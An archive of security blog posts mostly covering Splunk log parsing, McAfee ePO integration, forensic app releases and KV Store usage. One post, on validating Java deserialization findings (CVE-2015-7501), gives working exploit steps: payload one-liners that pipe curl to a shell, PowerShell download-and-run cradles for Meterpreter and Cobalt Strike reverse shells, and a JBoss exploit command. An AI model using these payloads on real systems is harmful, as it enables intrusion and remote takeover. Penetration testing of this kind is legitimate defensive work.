Monday, April 24, 2017

Efficient Blue Coat (and other) Splunk Log Parsing

By Tony Lee

Special Notes

1)  This blog post pertains not only to Blue Coat logs, but potentially to other data sources as well.
2)  This is not a knock on Blue Coat, the app, or the TA; it is just one example of many where we might want to change the way we send data to Splunk.  Fortunately, Blue Coat provides the means to do so.  (hat tip)

Background info

A little while back, we were working on a custom Splunk app that included ingesting Blue Coat logs into a SOC's single pane of glass, but we were getting an error message of:

Field extractor name=custom_client_events is unusually slow (max single event time=1146ms)

The Splunk architecture was more than sufficient, and the Blue Coat TA worked great on small instances, but we found that it did not scale to a Blue Coat deployment of this magnitude.  The main reason for this error was that the field extraction in transforms.conf looked like this:

REGEX = (?<date>[^\s]+)\s+(?<time>[^\s]+)\s+(?<duration>[^\s]+)\s+(?<src_ip>[^\s]+)\s+(?<user>[^\s]+)\s+(?<cs_auth_group>[^\s]+)\s+(?<x_exception_id>[^\s]+)\s+(?<filter_result>[^\s]+)\s+\"(?<category>[^\"]+)\"\s+(?<http_referrer>[^\s]+)\s+(?<status>[^\s]+)\s+(?<action>[^\s]+)\s+(?<http_method>[^\s]+)\s+(?<http_content_type>[^\s]+)\s+(?<cs_uri_scheme>[^\s]+)\s+(?<dest>[^\s]+)\s+(?<uri_port>[^\s]+)\s+(?<uri_path>[^\s]+)\s+(?<uri_query>[^\s]+)\s+(?<uri_extension>[^\s]+)\s+\"(?<http_user_agent>[^\"]+)\"\s+(?<dest_ip>[^\s]+)\s+(?<bytes_in>[^\s]+)\s+(?<bytes_out>[^\s]+)\s+\"*(?<x_virus_id>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_name>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_operation>[^\"]+)

The robustness and volume of the data were simply too much for this type of extraction.


The solution is not to make Splunk adapt, but to change the way data is sent to it. The Blue Coat app and TA require sending data in the bcreportermain_v1 format--an ELFF format--and then try to parse this space-separated data using the complex regex seen above. Fortunately, you can instead instruct Blue Coat to send the data in a different format, such as key=value pairs--which Splunk likes and parses natively.

In this case, have the Blue Coat admins define a custom log format with the following fields:

Bluecoat|date=$(date)|time=$(time)|duration=$(time-taken)|src_ip=$(c-ip)|user=$(cs-username)|cs_auth_group=$(cs-auth-group)|x_exception_id=$(x-exception-id)|filter_result=$(sc-filter-result)|category=$(cs-categories)|http_referrer=$(cs(Referer))|status=$(sc-status)|action=$(s-action)|http_method=$(cs-method)|http_content_type=$(rs(Content-Type))|cs_uri_scheme=$(cs-uri-scheme)|dest=$(cs-host)|uri_port=$(cs-uri-port)|uri_path=$(cs-uri-path)|uri_query=$(cs-uri-query)|uri_extension=$(cs-uri-extension)|http_user_agent=$(cs(User-Agent))|dest_ip=$(s-ip)|bytes_in=$(sc-bytes)|bytes_out=$(cs-bytes)|x_virus_id=$(x-virus-id)|x_bluecoat_application_name=$(x-bluecoat-application-name)|x_bluecoat_application_operation=$(x-bluecoat-application-operation)|target_ip=$(cs-ip)|proxy_name=$(x-bluecoat-appliance-name)|proxy_ip=$(x-bluecoat-proxy-primary-address)|$(x-bluecoat-special-crlf)

Since this data now comes into Splunk as key=value pairs, Splunk parses it natively.
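To see why this is so much cheaper, compare the single split-based pass that key=value parsing needs against the 27-group regex above. Here is a minimal Python sketch of the idea (the field names follow the custom format; this is an illustration of the technique, not Splunk's actual parser):

```python
# Minimal sketch: parsing one pipe-delimited key=value Blue Coat event.
# A single split pass replaces the 27-group regex shown earlier.
def parse_kv_event(raw: str, delimiter: str = "|") -> dict:
    fields = {}
    for token in raw.strip().split(delimiter):
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key.strip()] = value.strip()
    return fields

sample = "Bluecoat|date=2017-04-24|time=12:00:01|src_ip=|action=TCP_ALLOWED"
event = parse_kv_event(sample)
print(event["action"])  # -> TCP_ALLOWED
```

Note that a token with no value (such as src_ip= above) still yields the field with an empty string, whereas the monolithic regex fails or backtracks when a field is missing.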

We just removed the TAs from the indexer and replaced them with a simpler props.conf file like this:
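A minimal props.conf along those lines might look like the following sketch (the sourcetype name here is an assumption--match it to whatever your Blue Coat inputs use):

```ini
[bluecoat]
# Each event arrives as a single line; disabling line merging
# (on by default) speeds up parsing considerably.
SHOULD_LINEMERGE = false
```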


This just turns off line merging, which is on by default, and makes the parsing even faster. Also remember to rename the props.conf and transforms.conf files (ex: to .bak) included in the app if you have it installed on your search head--they contain the same complicated regex, which will slow down data ingestion. Lastly, by defining your own format, you can add other fields you care about--such as the target IP (cs-ip), which for some reason is not included in the default bcreportermain_v1 format. We hope this helps others that run into this situation.


Again, this issue is not isolated to Blue Coat; it applies to any data source that can change the way it sends data. We were quite happy to find that Blue Coat provides that ability--it certainly reduced the load on the entire system and gave back those resources for adding other data.  Hat tip to Blue Coat for the flexibility of custom log formats.  Happy Splunking!

Sunday, April 9, 2017

Quick and Easy Deserialization Validation

By Tony and Chris Lee

Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products, including but not limited to JBoss, Jenkins, WebLogic, and WebSphere. The example finding below is from the Nessus vulnerability scanner:

JBoss Java Object Deserialization RCE
Description:  The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.  (CVE-2015-7501)

Family: Web Servers
Nessus Plugin ID: 87312

Now that you have the finding, you need to validate it.  We will outline just one possible method for validating JBoss, Jenkins, WebLogic, and WebSphere below.

Background info

In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."

For more information, a very good and detailed explanation can be found here:

Step 1) Download Tools

Now on to the exploit/validation!  Clone or download the zipped tools here:

Step 2) Building the payload

Quick and easy one-liners per the exserial instructions:
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell.  If you are spawning reverse shells, remember to start your listener first.  ;-)

1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl|/bin/sh" > payload.ser

2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j

Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser

3)  Cobalt Strike beacon
Create the listener (ex:  reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name:  rev_https
Payload:  windows/beacon_https/reverse_https
IP:  <Your teamserver IP>
Port:  443

Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this

Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(''))" > payload.ser

Step 3) Running the Exploit

Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The syntax and an example for the JBoss exploit are shown below.

python http://<target>:<port> /path/to/payload

python  http://JbossServer:8080 /root/deserial/payload.ser
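For reference, delivery scripts for CVE-2015-7501 typically POST the serialized object to JBoss's JMXInvokerServlet endpoint with a Java serialization content type. Below is a hedged Python sketch of that delivery step (an illustration of the technique, not the actual script from the toolkit):

```python
import urllib.request

def build_jboss_request(base_url: str, payload: bytes) -> urllib.request.Request:
    """Build the POST that delivers a serialized Java object to the
    classic JBoss invoker endpoint (CVE-2015-7501)."""
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/invoker/JMXInvokerServlet",
        data=payload,  # e.g., the bytes of payload.ser
        headers={"Content-Type": "application/x-java-serialized-object"},
        method="POST",
    )

# Serialized Java streams start with the magic bytes AC ED 00 05.
req = build_jboss_request("http://JbossServer:8080", b"\xac\xed\x00\x05")
print(req.full_url)  # -> http://JbossServer:8080/invoker/JMXInvokerServlet
```

Sending the request (urllib.request.urlopen(req)) often returns a server error even on success, since the response is not a valid serialized object--watch your listener for the real result.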


This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include downloading a "flag", running a reverse ping, or a netcat shell.

Huge thanks to the authors of these publicly available tools.

Saturday, January 7, 2017

Forensic Investigator Splunk App - Version 1.1.8

By Tony Lee and Kyle Champlin

The latest version of the Forensic Investigator app (version 1.1.8) is now available. We will cover only three major changes in depth, but here is the full list of details:
  • Added option to hide the MIR menus via the setup screen
  • Added proxy support to setup screen
  • Made vtLookup proxy aware
  • Made vtLookup accept and use non-default API key
  • Added CyberChef (En/Decoder -> CyberChef) - Big thanks to GCHQ for the awesome tool!
  • Added ePO Connector to control McAfee ePolicy Orchestrator
    • Requires editing bin\ and adding ePO IP, port, username, and password

1.  CyberChef

The folks over at GCHQ created an awesome encoding/decoding tool called CyberChef. Even more impressive, it is a stand-alone client-side HTML page, released under the Apache License version 2.0. We integrated it into the Forensic Investigator app as a useful component that can be utilized even on closed networks. Huge thanks to the developers at GCHQ.

CyberChef integrated into the Forensic Investigator App

2.  ePO Connector

The Forensic Investigator ePO connector can be used to integrate Splunk and McAfee's ePolicy Orchestrator (ePO). This dashboard can task ePO via its API to do the following:
  • Query
  • Wake up
  • Set tag
  • Clear tag
This allows users to query for hosts using a hostname, IP address, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.  This feature is covered in more depth in the Splunk and McAfee ePO Integration articles below.

ePO connector feature

3.  Proxy Awareness

You spoke and we listened. The Virus Total Lookup feature in the app is now proxy aware. If this feature works well, we will make the rest of the app proxy aware too. To enable the proxy settings, use the setup screen (Help -> Configure App) and enter the required data found in the screenshot.

Proxy setup
Please let us know if you run into any issues with the proxy setup or if it seems to be working well for you.  We will use this information to tweak the setup screen in the next version of the app.


We enjoy the feedback on the application--both good and bad, so please keep it coming. Let us know how you are using the application and how we can make it better.  Enjoy. :-)

Monday, December 26, 2016

Splunk and McAfee ePO Integration – Part II

By Tony Lee

In our previous article we outlined one method to integrate McAfee's ePolicy Orchestrator (ePO) with Splunk’s flexible Workflow actions. This allows SOC analysts to task ePO directly from Splunk. In this article, we will highlight a different and potentially more user friendly method. For convenience we have integrated this dashboard into version 1.1.8 of the Forensic Investigator app (Toolbox -> ePO Connector).

Forensic Investigator app ePO connector tool

As with the previous article, all that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

It may still be useful to first ensure that our ePO credentials, URL, and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will result in a list of supported Web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/"

If this fails, check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>"

Splunk Integration

The Forensic Investigator ePO connector dashboard contains the following ePO capabilities:

  • Query
  • Wake up
  • Set tag
  • Clear tag

This allows users to query for hosts using a hostname, IP address, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.


1)  Download and install
Before this integration is possible, first install the Forensic Investigator app (version 1.1.8 or later).

2)  CLI edit
Then edit the following file:


Set the following:  IP, port, username, and password

theurl = 'https://<IP>:8443/remote/'
username = '<username>'
password = '<password>'
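Under the hood, a connector script along these lines presumably issues Basic-auth requests against the same system.find endpoint we tested with curl. Below is a standard-library-only Python sketch (the function name and example values are illustrative, not the actual app code):

```python
import base64
import urllib.request

def build_epo_request(theurl: str, username: str, password: str,
                      search_text: str) -> urllib.request.Request:
    """Build a Basic-auth GET for ePO's system.find Web API command."""
    creds = base64.b64encode(f"{username}:{password}".encode()).decode()
    return urllib.request.Request(
        url=theurl.rstrip("/") + "/system.find?searchText=" + search_text,
        headers={"Authorization": "Basic " + creds},
    )

req = build_epo_request("https://10.0.0.5:8443/remote/", "svc_splunk",
                        "secret", "WORKSTATION01")
print(req.full_url)
# -> https://10.0.0.5:8443/remote/system.find?searchText=WORKSTATION01
```

Because the ePO server typically uses a self-signed certificate, a real request would also need an SSL context that tolerates it (the equivalent of curl's -k flag).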

3)  Web UI dashboard edit
The dashboard is accessible via Toolbox --> ePO Connector.  There is a Quarantine tag present by default, but others can be added via the Splunk UI by selecting the edit button on the dashboard.

Lingering concerns

Using this integration method, there are a few remaining concerns:

  • The ePO password is contained in the python script
    • Fortunately, this is only exposed to Splunk admins.
    • Let us know if you have another solution.  :-)
  • ePO API authentication uses Base64.  The resulting URL can be modified and it will still be authenticated and will issue commands to ePO.
    • SSL should be used with the ePO API to protect the communications
    • Limit this dashboard to only trusted users.
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries.  We also filtered out blank queries in the python script.


This second ePO integration method should be quite user friendly and can be restricted to those who only need access to this dashboard. It could also be used in conjunction with our previous integration method. Enjoy!

Sunday, December 18, 2016

Splunk and McAfee ePO Integration – Part I

By Tony Lee

Have you ever wanted to task McAfee ePolicy Orchestrator (ePO) right from Splunk? Lucky for us, ePO has robust Web API scripting capabilities and is well-documented in a reference guide found here:

Combine this with Splunk’s flexible Workflow actions and we have the basic building blocks to allow SOC analysts to task ePO. All that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

In order to start the integration, let’s first ensure that our credentials, URL and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will result in a list of supported Web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/"

If this fails, check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>"

Pro Tips:
  • Do not leave the searchText parameter blank or it will return everything in ePO.
  • Machine readable output such as XML or JSON may be desired. 

To return XML or JSON, use the :output parameter as shown in the example below:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?:output=json&searchText=<hostname/IP/MAC/User>"

Our use case

There are many ways in which a SOC could benefit from Splunk/ePO integration. However, in this use case, we have ePO configured to perform automated actions (such as run a full AV scan) when certain tags are applied to hosts. Now wouldn’t it be convenient if we could tell Splunk to have ePO apply the tag to kick off the actions? How about clearing tags?  Both actions are exposed through ePO’s API:

Apply a tag: /remote/system.applyTag?names=<Host>&tagName=FullAVScan

Clear a tag: /remote/system.clearTag?names=<Host>&tagName=FullAVScan
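Since both endpoints share the same shape, the tasking URLs can be generated rather than hand-built. A small illustrative Python sketch (the function name and defaults are our own, not part of ePO or Splunk):

```python
def epo_tag_url(server: str, port: int, action: str, host: str,
                tag: str = "FullAVScan") -> str:
    """Build an ePO applyTag/clearTag Web API URL.
    action must be 'applyTag' or 'clearTag'."""
    if action not in ("applyTag", "clearTag"):
        raise ValueError("action must be 'applyTag' or 'clearTag'")
    return (f"https://{server}:{port}/remote/system.{action}"
            f"?names={host}&tagName={tag}")

print(epo_tag_url("epo.example.com", 8443, "applyTag", "WORKSTATION01"))
# -> https://epo.example.com:8443/remote/system.applyTag?names=WORKSTATION01&tagName=FullAVScan
```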

Splunk Integration

One possible integration leverages Splunk’s Workflow Actions to issue these web API commands to ePO. This allows the analyst to pivot from the Event screen in a search using the Event Actions button as shown in the screenshot below:

Splunk’s Workflow actions can be setup using the following:
Settings -> Fields -> Workflow Actions -> Add New

(Note:  This example uses the Hostname field to identify the asset; change this to match your field name):

Name:  FullAVScan
Label:  Run a FullAVScan on $Hostname$
Apply only to the following fields:  Hostname
Apply only to the following event types:  left blank 
Show action in: Both
Action type:  link
URI:  https://<User>:<Password>@<EPOServer>:<EPOport>/remote/system.applyTag?names=$Hostname$&tagName=FullAVScan
Open link in:  New window
Link method:  get

Note:  You may need to restart Splunk to make sure the Workflow Actions appear in the Event Actions drop down.

Security mitigations

This integration obviously exposes a lot of power to the Splunk analysts and potential attackers if Splunk is compromised.  Here are some steps that can be taken to limit abuse:

  • Create a specific service account in ePO for Splunk to use, do not reuse a user account
  • Limit access to the Workflow Action to a small group
  • Set a Network IP filter for the ePO/Splunk account to block any IP from using that account except the Splunk search head

The results that are returned from ePO depend on the action performed; however, the message format seems consistent.  See below for example messages for both successful and unsuccessful tasking.

Successful tasking:


Unsuccessful tasking:



Other possibilities

We have demonstrated the ability to query ePO for information by using hostname, IP address, MAC address, and user.  We also showed how it is possible to apply and remove tags.  But what else is possible?  You could ask ePO using the first test command used at the beginning of this article.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/"

ComputerMgmt.createCustomInstallPackageCmd windowsPackage deployPath [ahId] [fallBackAhId]
[useCred] [domain] [username] [password] [rememberDomainCredentials]
agentmgmt.listAgentHandlers - List all Agent Handlers
clienttask.export [productId] [fileName] - Exports client tasks
clienttask.find [searchText] - Finds client tasks
clienttask.importClientTask importFileName – Imports

To obtain help on a specific API command, use the following syntax with the command parameter:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/"

Displays all queries that the user is permitted to see. Returns the list of queries or throws on error.
Requires permission to use queries.


If issues arise, just fall back to the curl command to eliminate complexity.  Verify credentials, IP, port, and connectivity, then move on to the more complicated integration.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/"

Lingering concerns

Using this integration method, there are a few remaining concerns:

  • The ePO password is contained in the Splunk Workflow setup screen
    • Fortunately, this is only exposed to Splunk admins.
  • ePO API authentication uses Base64.  The resulting URL can be modified and it will still be authenticated and will issue commands to ePO.
    • SSL in ePO should be used to protect the data
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries


This is just one example of what can be done when integrating Splunk and McAfee ePO. In our next article we will discuss further integration options using a little python and simple XML. We hope this was useful if you are ever tasked with integrating these two technologies.

Saturday, September 24, 2016

Splunk Stacking Redline and MIR host-based forensic artifacts

By Tony Lee, Max Moerles, Ian Ahl, and Kyle Champlin


Mandiant’s free forensics tool, Redline®, is well-known for its powerful ability to hunt for evil using IOCs, collect host-based artifacts, and even analyze that collected data.  While this gratis capability is fantastic, it is limited to analyzing data from only one host at a time.  But imagine the power and insight that can be gained when looking at a large set of host-based data; especially when the hosts are standardized using a base build or gold disk image.  This would allow analysts to stack this data and use statistics to find outliers and anomalies within the network.  These discovered anomalies could include:

  • Unique services within an organization (names, paths, service owners)
  • Unique processes within an organization (names, paths, process owners)
  • Unique persistent binaries (names, paths, owners)
  • Drive letters/mappings that don't meet corporate standards
  • Infrequent user authentication (such as forgotten or service accounts)

Any of the above example issues could be misconfigurations or incidents--neither of which should go unnoticed or unresolved.

Requirements and Prototyping

To solve the stacking problem, we had four major requirements.  We needed a platform that could:

1) Monitor a directory for incoming data
2) Easily parse XML data (since both Redline and MIR output evidence to XML)
3) Handle large files and break them into individual events
4) Apply “big data” analytics to lots of hosts and lots of data
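Requirement 2 is easy to prototype. Here is a rough Python sketch of splitting a Redline/MIR-style XML result file into individual events (the element names below are simplified placeholders, not the exact audit schema):

```python
import xml.etree.ElementTree as ET

def xml_items_to_events(xml_text: str) -> list:
    """Split a Redline/MIR-style result file into one dict per item."""
    root = ET.fromstring(xml_text)
    events = []
    for item in root:  # each child element becomes one event
        events.append({child.tag: (child.text or "") for child in item})
    return events

sample = """<itemList>
  <ServiceItem><name>evilSvc</name><path>C:\\tmp\\evil.exe</path></ServiceItem>
  <ServiceItem><name>Spooler</name><path>C:\\Windows\\System32\\spoolsv.exe</path></ServiceItem>
</itemList>"""
events = xml_items_to_events(sample)
print(len(events))        # -> 2
print(events[0]["name"])  # -> evilSvc
```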

After looking at the requirements and experimenting a bit, Splunk seemed like a good fit.  We started our prototyping by parsing a few output files and creating dashboards within our freely available side project, the Splunk Forensic Investigator app.  The architecture looks like the following:

Figure 1:  Architecture required to process Redline and MIR files within Splunk

We gave this app the ability to process just a few Redline and MIR output files such as system, network, and drivers.  Then we solicited feedback and were pleased with the response.


Since the prototype gained interest, we continued the development efforts and the Splunk Forensic Investigator app now handles 15 output files, including:

User Accounts
URL History
Driver Modules
File Listings
Event Logs

After installation and setup, the first dashboard you will see when processing MIR and Redline output is the MIR Analytics dashboard.  This provides heads up awareness of the number of hosts processed, number of individual events, top source types, top hosts, and much more as shown in Figure 2.

Figure 2:  Main MIR Analytics dashboard

Additionally, every processed output type includes both visualization dashboards and analysis dashboards.  Visualization dashboards are designed to flush out anomalies using statistics such as counts, unique counts, and most and least frequent events.  An example can be seen in Figure 3.

Figure 3:  Example visualization dashboard which shows least and most common attributes
The analysis dashboards parse the XML output from Redline and MIR to display it in a human readable and searchable format.  An example can be seen below in Figure 4.

Figure 4:  Example analysis dashboard which shows raw event data


If you use Redline or MIR and would like to stack data from multiple hosts, feel free to download our latest version of the Splunk Forensic Investigator App.  Follow the instructions on the Splunk download page and you should be up and running in no time.  This work can also be expanded to HX, but it will most likely require a bit of pre-processing by first reading the manifest.json file to determine the contents of the randomized file names.  We hope this is useful for other FireEye/Mandiant/Splunk enthusiasts.

Head nod to the "Add-on for OpenIOC by Megan" for ideas.

Monday, June 6, 2016

Event acknowledgement using Splunk KV Store

By Tony Lee


Whether you use Splunk for operations, security, or any other purpose--it can be helpful to be able to acknowledge events and add notes.  Splunk provides a few different methods to accomplish this task:  using an external database, writing to files, or the App Key Value Store (aka KV Store).  The problem with using an external database is that it requires another system to provision and protect and can add unwanted complexity.  Writing to files can be problematic in a distributed Splunk architecture that may use clustered or non-clustered components.  The last option is the Splunk KV Store which appears to be the current recommendation from Splunk, but this can also appear complex at first--thus we will do our best to break it down in this article.

In the most basic explanation, the KV Store allows users to write information to Splunk and recall it at a later time.  Furthermore, KV Store lookups can be used to augment your event data by mapping event fields to fields assigned in your App Key Value Store collections. KV Store lookups can be invoked through REST endpoints or by using the following SPL search commands: lookup, inputlookup, and outputlookup.  REST commands can require additional permissions, so this article will look at possibilities using the search commands.


Before we get started, we will list some references that helped in our understanding of the Splunk KV Store:

Deciding on the fields

For this example, we wanted to add a couple of fields to augment our event data: an acknowledgement field (we will call this Ack) and a notes field (we will call this Notes).  We will match the unique event id field with a KV Store field that is also called id.

So, in summary, we have id, Ack, and Notes.  Splunk also uses an internal _key field, but we will not reference this directly in our efforts.

Getting started

Per our references above on configuring KV Store lookups, we will need two supporting configurations:

  1. A collections.conf file specifying our collection name
  2. A stanza in transforms.conf to specify kvstore parameters

cat collections.conf 
# Splunk app KV Store collection file
[acknotescoll]

head transforms.conf 
[acknotes]
external_type = kvstore
collection = acknotescoll
fields_list = _key, id, Ack, Notes

Interacting with KV Store using search

The reference links above provide helpful examples, but they do not cover everything necessary.  Some of this was discovered through a bit of trial and error--especially the flags and their resulting behavior.  Below we list the major actions that can be taken and the search commands necessary to perform them:

Write new record:
| localop | stats count | eval id=101 | eval Ack="Y" | eval Notes="These are notes for event 101"| outputlookup acknotes append=True

Note:  Without append=True, the entire KV Store is erased and only this record will be present

Update a record (only works if the record already exists):
| inputlookup acknotes where id="100" | eval Ack="N" | eval Notes="We can choose not to ack event 100" | outputlookup acknotes append=True

Note:  Without append=True, the entire KV Store is erased and only this record will be present

Read all records:
| inputlookup acknotes

Read a record (A new search):
| inputlookup acknotes where id="$id$" | table _key, id, Ack, Notes

Read a record (combined with another search):
<search> | lookup acknotes id OUTPUT _key, Ack, Notes | table _key, id, Ack, Notes

Limitation and work around

Unfortunately, Splunk does not appear to have a single search command/method that updates a record, creating it if it does not already exist.  I may be mistaken about this and hope that I am missing some clever flag, so feel free to leave comments in the feedback section below.  To get around this limitation, we first created a "simple" search command to check for the existence of a record.

Determine if record exists:
| inputlookup acknotes where id="108" | appendpipe [stats count | where count==0] | eval execute=if(isnull(id),"Record Does Not Exist","Record Exists!") | table execute

Example of a record that exists

Example of record that does not exist

Conditional update:
Now that we can determine if a record exists and we know how to create a new record and update an existing record, we can combine all three to modify and/or create entries depending on their existence.

<query>| inputlookup acknotes where id="$id$" | appendpipe [stats count | where count==0] | eval execute=if(isnull(id),"| localop | stats count | eval id=$id$ | eval Ack=\"$Ack$\" | eval Notes=\"$Note$\" | outputlookup acknotes append=True","| inputlookup acknotes where id=\"$id$\" | eval Ack=\"$Ack$\" | eval Notes=\"$Note$\" | outputlookup acknotes append=True") | eval kvid=$id$ | eval kvack="$Ack$" | eval kvnote="$Note$" | eval Submit="Click me to Submit" | table kvid, kvack, kvnote, execute, Submit</query>
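The conditional logic above is simply an upsert: update the record when the key exists, create it otherwise. The same decision expressed in plain Python (a sketch of the idea, not of Splunk internals):

```python
def upsert(store: dict, record_id: str, ack: str, notes: str) -> str:
    """Update a record if record_id exists, otherwise create it --
    mirroring the inputlookup existence check driving outputlookup."""
    action = "updated" if record_id in store else "created"
    store[record_id] = {"Ack": ack, "Notes": notes}
    return action

kv = {"100": {"Ack": "N", "Notes": "existing record"}}
print(upsert(kv, "100", "Y", "now acknowledged"))  # -> updated
print(upsert(kv, "101", "Y", "brand new record"))  # -> created
```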


These are just some examples of what is possible.

You could create an event acknowledgement page

Event acknowledgement page

Once the fields are filled in at the top with the event id, acknowledgement, and notes, it could create the command to either update or add a new entry to the KV Store.  Clicking the Submit hyperlink will actually run that command and modify the KV Store.

Event acknowledgement page filled out and waiting for click to submit

Once the data is populated in the KV Store, these records can be mapped to the original events to add this data for analysts.

Original event data with KV Store augmentation


Hopefully this helps expose some of the interesting possibilities of using Splunk's KV Store to create an event acknowledgement/ticketing system using search operations.  Feel free to leave feedback below--especially if there is an easier search operation for updating a record and adding a new one if it does not already exist.  Thanks for reading.